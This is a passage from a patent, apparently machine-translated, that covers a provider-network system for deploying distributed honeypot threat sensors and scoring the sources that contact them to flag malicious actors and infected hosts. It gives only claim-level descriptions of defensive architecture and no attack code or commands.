[0389] The following operations are performed using the distributed threat sensor analysis and related components:

[0390] Generate metrics about one or more of the identified known participants that have been infected with malware for display in a user interface or dashboard.

[0391] Clause 54. The method according to any one of Clauses 45 to 53 further comprises:

[0392] The following operations are performed using the distributed threat sensor analysis and related components:

[0393] The identifiers of the malicious actors and the identifiers of one or more known actors infected with malware are stored in a database, wherein the database provides a query interface for analyzing the information about the malicious actors and the known actors infected with malware.

[0394] Clause 55. A non-transitory computer-readable storage medium containing one or more stored program instructions that, when executed on or across one or more processors of a distributed threat sensor analysis and related components, cause the one or more processors to:

[0395] Obtain multiple identifiers of the corresponding sources that interact with multiple threat sensors, and corresponding salience scores associated with the corresponding identifiers among the multiple identifiers;

[0396] Identifiers of malicious actors, including a subset of the plurality of identifiers, are determined at least in part based on the salience scores.

[0397] Receive identifiers of multiple known participants, wherein the multiple known participants include one or more of the following: servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network;

[0398] Associating the identifier of a malicious actor with the identifier of a known actor to identify one or more of the known actors as infected with malware; and

[0399] Provide the identifiers of one or more of the known participants who are infected with malware to one or more targets.

[0400] Clause 56. One or more non-transitory computer-readable storage media as described in Clause 55, wherein, in order to determine the identifier of a malicious actor, the program instructions further cause the one or more processors of the distributed threat sensor analysis and related components to:

[0401] Determine the malicious salience score, including salience scores that exceed a received or determined threshold; and

[0402] The corresponding identifier associated with the malicious salience score is identified as the identifier of the malicious actor.

[0403] Clause 57. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 55 or 56, wherein, in response to identifying one or more of the known actors as infected with malware, the program instructions further cause the one or more processors of the distributed threat sensor analysis and related components to:

[0404] Trigger the execution of client-provided functions;

[0405] Send a message to the remote network or the client network, instructing the one or more known participants; or

[0406] Terminate the security certificates of one or more known participants in the provider network.

[0407] Clause 58. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 55 to 57, wherein the program instructions further cause the one or more processors of the distributed threat sensor analysis and related components to:

[0408] Receive feedback on whether it was correct to identify one or more of the known participants as infected with malware; and

[0409] The corresponding salience score associated with the corresponding identifier is updated, at least in part, based on the received feedback.

[0410] Clause 59. One or more non-transitory computer-readable storage media pursuant to any one of Clauses 55 to 58, wherein, in order to obtain the corresponding saliency score associated with the corresponding identifier, the program instructions further cause the one or more processors of the distributed threat sensor analysis and related components to target a single source of the interaction among the corresponding sources interacting with the plurality of threat sensors:

[0411] Recentness information regarding the relevance of the interaction with the plurality of threat sensors by the single source is determined, at least in part, based on aggregated information about the interaction with the single source within a time period and aggregated information about the interaction with the single source in a previous time period.

[0412] Determine the number of the plurality of threat sensors communicating with the single source during at least one period of the time period; and

[0413] The salience score in the corresponding salience score of the interacting single source is calculated, based at least in part on the determined proximity information and the determined number of threat sensors communicating with the single source.

[0414] Clause 60. One or more non-transitory computer-readable storage media as described in Clause 59, wherein, in order to calculate the salience score of the single source of the interaction, the program instructions further cause the one or more processors of the distributed threat sensor analysis and related components to:

[0415] The saliency score is calculated at least in part based on one or more of the following: the determined classification of the payload received from the single source of the interaction, the determined number of different ports interacting with the single source of the interaction, the determined number of threat sensors interacting with the single source of the interaction, the determined number of outbound initiating connections associated with the single source of the interaction, or the determined static or dynamic nature of the network address associated with the single source of the interaction.

[0416] in conclusion

[0417] Various embodiments may further include receiving, transmitting, or storing instructions and / or data implemented on a computer-accessible medium as described above. Generally, a computer-accessible medium may include: storage media or memory media, such as magnetic or optical media, like a magnetic disk or DVD / CD-ROM; volatile or non-volatile media, such as RAM (e.g., SDRAM, DDR, RDRAM, SRAM, etc.), ROM, etc.; and transmission media or signals, such as electrical, electromagnetic, or digital signals transmitted via communication media such as networks and / or wireless links.

[0418] The various methods shown in the figures and described herein represent exemplary embodiments of the methods. These methods can be implemented in software, hardware, or a combination thereof. The order of the methods can be changed, and various elements can be added, reordered, combined, omitted, modified, etc.

[0419] Various modifications and alterations can be made, as will be apparent to those skilled in the art who benefit from this disclosure. It is intended to include all such modifications and alterations, and therefore the above description should be considered illustrative rather than restrictive.

Claims

1. A system for deploying and managing threat sensors, comprising: Multiple computing devices, physically located in multiple different geographical areas, and each having a corresponding processor and memory for executing multiple threat sensors; One or more computers, having one or more processors and associated memory, are configured to implement a threat sensor deployment and management service for a provider network, wherein the threat sensor deployment and management service is configured to: Determine deployment plans for multiple threat sensors in different corresponding geographic areas across multiple different geographic regions, wherein each of the threat sensors specified by the deployment plans uses multiple different types of threat data collectors, wherein the threat data collectors are honeypots, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plans specify different lifetimes for the threat sensors, wherein the lifetimes decrease over time. The multiple threat sensors are deployed and configured according to the deployment plan at multiple different network addresses in multiple different geographical regions; Collect threat data from deployed threat sensors; Based on the collected threat data and the different lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; as well as According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

2. The system of claim 1, wherein the provider network provides a plurality of services, including a virtual computing instance service, and wherein the threat sensor deployment and management service uses the virtual computing instance service to deploy at least some of the plurality of threat sensors.

3. The system of claim 2, wherein at least one specific threat sensor among the plurality of threat sensors not implemented by the virtual computing instance service is deployed outside the provider network, and wherein, in order to collect threat data from the deployed threat sensor, the threat sensor deployment and management service is further configured to: Data is collected from at least one of the specific threat sensors deployed outside the provider's network from among the plurality of threat sensors.

4. A method for deploying and managing threat sensors, comprising: Execute through threat sensor deployment and management components: Determine a deployment plan for multiple threat sensors in corresponding geographic areas of multiple different geographic regions, wherein each of the threat sensors specified by the deployment plan uses multiple different types of threat data collectors, wherein the threat data collectors are honeypots, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors, wherein the lifetimes decrease over time. The multiple threat sensors are deployed and configured at multiple different network addresses in the multiple different geographical regions according to the deployment plan; Collect threat data from deployed threat sensors; Based on the collected threat data and the different lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; as well as According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

5. The method of claim 4, further comprising: The threat sensor deployment and management components perform adjustment iterations at different times, wherein a specific adjustment iteration includes repeating the following operations: The threat data is collected from the deployed threat sensors; Determine the adjusted deployment plan; as well as Perform the adjustments to the threat sensor.

6. The method of any one of claims 4 or 5, wherein performing the adjustment of the threat sensor according to the adjusted deployment plan further comprises one or more of the following: terminating the threat sensor, deploying at least one new threat sensor at a new network address different from the plurality of different network addresses where the plurality of threat sensors have been deployed, or modifying the lifetime of the deployed threat sensor.

7. The method according to any one of claims 4 to 6, further comprising: Information about inbound communications received at the corresponding threat sensor in the deployed threat sensors is recorded by the threat data collector of the corresponding threat sensor in the deployed threat sensors. as well as Threat sensor logs are generated from the recording actions of the corresponding threat data collector using the corresponding threat sensor among the deployed threat sensors.

8. The method according to any one of claims 4 to 7, further comprising: By using specific threat data collectors among the threat data collectors that have deployed threat sensors, inbound communications are responded to with different identification information to simulate responses from different types of systems.

9. The method according to any one of claims 4 to 8, further comprising: Deploy and manage the components using the threat sensors to perform the following operations: It is determined that one or more threat sensors in a specific geographic area are receiving more inbound communications than a threshold number; as well as Based at least in part on the determination, additional threat sensors are deployed at network addresses in the specific geographic region.

10. The method according to any one of claims 4 to 9, further comprising: Deploy and manage the components using the threat sensors to perform the following operations: To determine if a specific threat sensor among multiple deployed threat sensors is receiving more inbound communications than a threshold; and Based at least in part on the determination, the lifetime of the specific threat sensor is extended.

11. The method of any one of claims 4 to 10, wherein at least two of the different threat data collectors in the deployed threat sensors communicate on the same port using different communication protocols, the method further comprising: Perform the following operations using the deployed threat sensors: Determine the inbound communication protocol; as well as The threat data collector is selected from the at least two threat data collectors that communicate using the determined inbound communication protocol to process the inbound communication.

12. A non-transitory computer-readable storage medium containing one or more stored program instructions that, when executed on or across one or more processors of a threat sensor deployment and management component, cause the one or more processors to: Determine a deployment plan for multiple threat sensors in corresponding geographic areas of multiple different geographic regions, wherein each of the threat sensors specified by the deployment plan uses multiple different types of threat data collectors, wherein the threat data collectors are honeypots, wherein at least some of the different types of threat data collectors use different communication protocols or communication ports, or provide different responses to inbound communications, and wherein the deployment plan specifies different lifetimes for the threat sensors, wherein the lifetimes decrease over time. The multiple threat sensors are deployed and configured at multiple different network addresses in the multiple different geographical regions according to the deployment plan; Collect threat data from deployed threat sensors; Based on the collected threat data and the different lifetimes of the threat sensors, an adjusted deployment plan is determined, including one or more adjustments to the deployment plan; as well as According to the adjusted deployment plan, the adjustments to the threat sensors are performed in one or more of the geographical regions.

13. The one or more non-transitory computer-readable storage media of claim 12, wherein the program instructions further cause the one or more processors of the threat sensor deployment and management component to: Adjustment iterations are performed at different times, where a particular adjustment iteration involves repeating the following operations: The threat data is collected from the deployed threat sensors; Determine the adjusted deployment plan; and Perform the adjustments to the threat sensor.

14. One or more non-transitory computer-readable storage media according to any one of claims 12 or 13, wherein, in order to perform the adjustment of the threat sensor according to the adjusted deployment plan, the program instructions further cause the one or more processors of the threat sensor deployment and management component to perform one or more of the following: Terminating threat sensors; Deploy at least one new threat sensor at a new network address that is different from the multiple different network addresses where the multiple threat sensors have already been deployed; or Modify the lifetime of the deployed threat sensors.

15. One or more non-transitory computer-readable storage media according to any one of claims 12 to 14, wherein the program instructions further cause the one or more processors of the threat sensor deployment and management component to: Determine if a specific deployed threat sensor has received a threshold number of inbound communications from a single source; and Prevent the multiple different threat data collectors of the specific deployed threat sensor from responding to other inbound communications from the single source.

Citation Information

Patent Citations

  • Threat intelligence system

    US10397273B1